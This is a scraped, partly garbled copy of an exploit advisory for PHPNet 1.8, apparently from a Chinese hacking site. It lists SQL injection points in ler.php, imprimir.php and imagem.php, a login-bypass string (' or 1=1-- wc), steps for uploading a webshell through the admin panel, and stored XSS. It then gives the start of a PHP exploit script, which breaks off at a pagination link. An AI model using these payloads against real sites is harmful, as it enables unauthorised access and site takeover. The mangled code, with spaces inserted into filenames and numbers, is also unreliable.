PHPNet <= 1.8 (ler.php) SQL injection and fix-vulnerability warning-the black bar safety net

ID MYHACK58:62201234102
Type myhack58
Reporter 佚名
Modified 2012-06-13T00:00:00


<? php

Title: PHPNet < = 1.8 (ler.php) SQL Injection

Author WhiteCollarGroup


Download address:

Affected version: 1.8

Test platform: Debian GNU/Linux,Windows 7 Ultimate


This system, we discovered multiple sql injection

~> SQL Injection

This exploit is for a vulnerability in ler.php, but are the same vulnerability on imprimir.php and imagem.php.

ler. php? id=[SQLi]

imprimir. php? id=[SQLi]

imagem has. php? id=[SQLi]


php file.php /path/

~> Login bypass

In the login page, you can bypass the login using the "SQLi strings".

Go to http:// /path/admin/login.php

Login: 'or 1=1-- wc

Pass: wcgroup

~> arbitrary file upload

After open the administration panel, try to add a new article.

Use the upload form to upload your webshell.

After posting, access:


~> information disclosure



~> XSS Stored (persistent)

When posting a new article, you can post (D)HTML/Javascript codes on the page.


function _printf($str) {

echo $str."\ n";


function hex($string){

$hex="; // PHP 'Dim' =]

for ($i=0; $i < strlen($string); $i++){

$hex .= dechex(ord($string[$i]));


return '0x'.$ hex;



error_reporting(E_ERROR &E_USER_WARNING);

@ini_set('default_socket_timeout', 3 0);

echo "\n";

echo "PHPNet < = 1.8 SQLi Exploit\n";

echo "Discovered by WhiteCollarGroup\n";

echo " -";

if($argc!= 2) {


_printf("php $argv[0] <target>");


_printf("php $argv[0] http:// /path/");



$target = $argv[1];

if(substr($target, (strlen($target)-1))!="/") { // se o ultimo caractere nao for uma barra

$target .= "/";


$inject = $target . "ler. php? id=-0'%2 0";

$token = uniqid();

$token_hex = hex($token);

// vamos agora obter os seguintes dados: user() version()

echo "\n\n[*] Trying to get informations...\n";

[1] [2] next